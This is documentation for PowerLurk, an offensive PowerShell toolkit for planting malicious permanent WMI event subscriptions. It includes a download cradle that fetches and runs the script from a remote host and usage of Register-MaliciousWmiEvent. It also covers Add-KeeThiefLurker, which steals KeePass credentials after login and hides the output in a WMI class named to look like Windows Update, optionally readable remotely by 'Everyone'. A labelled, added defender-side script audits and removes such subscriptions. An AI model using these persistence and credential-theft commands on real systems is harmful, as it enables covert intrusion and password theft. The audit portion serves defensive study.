PowerLurk - Malicious WMI Events using PowerShell.

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:
1. Import locally:
PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\temp\PowerLurk.ps1

2. Download Cradle:
PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"

+ Get-WmiEvent
This cmdlet returns the active permanent WMI event objects (filter, consumer, and FilterToConsumerBinding) registered under a given name, so they can be inspected or piped to Remove-WmiObject for cleanup. Example usage:
1. Return all active WMI event objects with the name ‘RedTeamEvent’
Get-WmiEvent -Name RedTeamEvent

2. Delete ‘RedTeamEvent’ WMI event objects
Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject

+ Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
1. Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts
Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand "cmd.exe /c echo %ProcessId% >> c:\temp\log.txt" -Trigger ProcessStart -ProcessName notepad.exe

2. Cleanup Malicious WMI Event

Get-WmiEvent -Name LogNotepad | Remove-WmiObject
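To see what such a Filter/Consumer/Binding triad looks like from the defender's side, here is an added example (not part of PowerLurk) that walks root\subscription, resolves each binding to its filter and consumer, shows the query and the action that would run, and offers a by-name removal helper. It assumes only the built-in __EventFilter, __EventConsumer and __FilterToConsumerBinding classes and an elevated PowerShell session.

```powershell
# Added example, not PowerLurk code: audit permanent WMI event subscriptions.
function Get-WmiSubscriptionTriad {
    $ns = 'root\subscription'
    $filters   = Get-WmiObject -Namespace $ns -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $ns -Class __EventConsumer   # returns all subclasses
    $bindings  = Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding

    foreach ($b in $bindings) {
        # Binding references are paths such as __EventFilter.Name="LogNotepad";
        # the quoted token is the object name in either short or full path form.
        $fName = ($b.Filter   -split '"')[1]
        $cName = ($b.Consumer -split '"')[1]
        $f = $filters   | Where-Object Name -eq $fName
        $c = $consumers | Where-Object Name -eq $cName

        # What the consumer would execute when the filter's query fires
        $action = switch ($c.__CLASS) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }
            'ActiveScriptEventConsumer' { $c.ScriptText }
            default                     { '(non-executing or orphaned consumer)' }
        }

        [pscustomobject]@{
            Filter       = $fName
            Consumer     = $cName
            ConsumerType = $c.__CLASS
            Query        = $f.Query
            Action       = $action
            # Command-line and script consumers are the types used for
            # persistence; the default "SCM Event Log" binding is benign.
            Executes     = ($c.__CLASS -in 'CommandLineEventConsumer', 'ActiveScriptEventConsumer')
        }
    }
}

# Remove a confirmed malicious triad by the name it was registered under.
function Remove-WmiSubscriptionTriad {
    param([Parameter(Mandatory)][string]$Name)
    $ns = 'root\subscription'
    Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like "*`"$Name`"*" -or $_.Consumer -like "*`"$Name`"*" } |
        Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventFilter   | Where-Object Name -eq $Name | Remove-WmiObject
    Get-WmiObject -Namespace $ns -Class __EventConsumer | Where-Object Name -eq $Name | Remove-WmiObject
}

Get-WmiSubscriptionTriad | Format-Table -AutoSize
```

Review the Query and Action columns before removing anything; a binding whose consumer launches cmd.exe or a script from a user-writable path is the pattern the Register-MaliciousWmiEvent example above produces.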

+ Add-KeeThiefLurker

Creates a permanent WMI event that will execute KeeThief (see @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.

Example Query custom WMI class

The KeeThief logic and its output are stored either in a custom WMI namespace and class or in registry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
1. Add KeeThiefLurker event using WMI class storage
Add-KeeThiefLurker -EventName KeeThief -WMI

2. Query custom WMI class
Get-WmiObject -Namespace root\software win32_WindowsUpdate -List

3. Extract KeeThief output from WMI class
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].Value))

4. Cleanup KeeThiefLurker
Remove-KeeThiefLurker -EventName KeeThief -WMI

Download: PowerLurk.zip
Source: https://github.com/Sw4mpf0x